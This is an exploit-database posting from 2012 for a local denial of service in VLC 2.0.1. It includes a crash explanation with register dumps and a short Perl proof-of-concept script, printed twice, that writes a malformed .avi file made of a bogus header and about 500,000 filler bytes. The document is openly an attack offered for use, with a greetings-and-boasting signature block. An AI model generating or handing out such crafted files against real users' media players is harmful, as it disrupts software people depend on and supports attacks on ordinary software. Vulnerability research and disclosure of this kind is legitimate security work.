VLC 2.0.1 Denial Of Service

` 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [x] Official Website: http://www.1337day.com 0  
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1  
0 0  
1 ========================================== 1  
0 I'm Dark-Puzzle From Inj3ct0r TEAM 0  
0 1  
1 dark-puzzle[at]live[at]fr 0  
0 ========================================== 1  
1 Pentesting/exploit coding/bug research 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1  
[0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]  
  
# Exploit Title: VLC 2.0.1 - .avi playlist plugins DoS (Explanation + PoC) .  
# Author: Dark-Puzzle .   
# Danger : Medium .  
# Category :Local Exploit .  
# Version: Latest ; 2.0.1 And 2.0.1 Twoflower (Previous versions are not tested but Maybe Vulnerable)   
# Vendor : www.videolan.org   
# Software Link : http://www.videolan.org/vlc/releases/2.0.1.html (Latest Version)  
# Date: 26 June 2012 .  
---------------------------------------------------------------------------  
Understanding the Exploit :  
  
Executing a .avi file created with the script below causes a DoS of the Playlist Plugins , so the playlist stop running . Clicking to play another media in the playlist or trying to Play/Pause/Stop doesn't work anymore . So The program Should be restarted .   
  
The issue is that the return adress to the plugins files in windows and VLC DLL in the stack (from 01EFF8BC to 01EFF9B8 [in my case] ) are facing a problem when filling ASCII + the hex code in the avi file .  
  
Registers :   
  
EAX 00000000  
ECX 00000000  
EDX 00000000  
EBX 000005FA  
ESP 01EFF8BC  
EBP 01EFF8C0  
ESI 01EFFB40  
EDI 01475FF8  
EIP 653FCF0F  
----------------------------------------  
  
LastErr ERROR_PATH_NOT_FOUND (00000003)  
  
----------------------------------------  
  
playlist plugin DLLs :   
  
libmpc_plugin.dll  
libsid_plugin.dll  
libxa_plugin.dll ...  
  
----------------------------------------  
  
We can find some return adresses refering to the playlist in the stack after openning the .avi file .  
So I've tried to create a file with a lib return adress with some nops and INT3's (not avalaible here) , and I've found that the DoS attack stops the playlist plugins from doing what they should do and making the program lose the playlist plugins paths even after loading them .As a result , you can't neither play any medias while the .avi file is in the playlist , nor play/pause/stop .   
  
----------------------------------------  
Exploitation ( PoC ) :   
  
#!/usr/bin/perl  
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  
my $d = "\x41" x 500429 ;  
  
  
my $file = "dark.avi";  
  
open ($File, ">$file");  
print $File $h,$d;  
close ($File);  
  
  
  
-----------------------------------------------------------------------------------------------  
  
  
Dark-Puzzle (Souhail) .  
\x90  
Follow me : fb.me/dark.puzzle  
\x90  
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army  
\x90  
Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....  
\x90  
Pentesting is my LIFE .  
  
GREY HAT Mercy From M0rocC0 .  
  
  
my $h ="\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  
my $d = "\x41" x 500429 ;  
  
  
my $file = "dark2.avi";  
  
open ($File, ">$file");  
print $File $h,$d;  
close ($File);  
  
  
  
`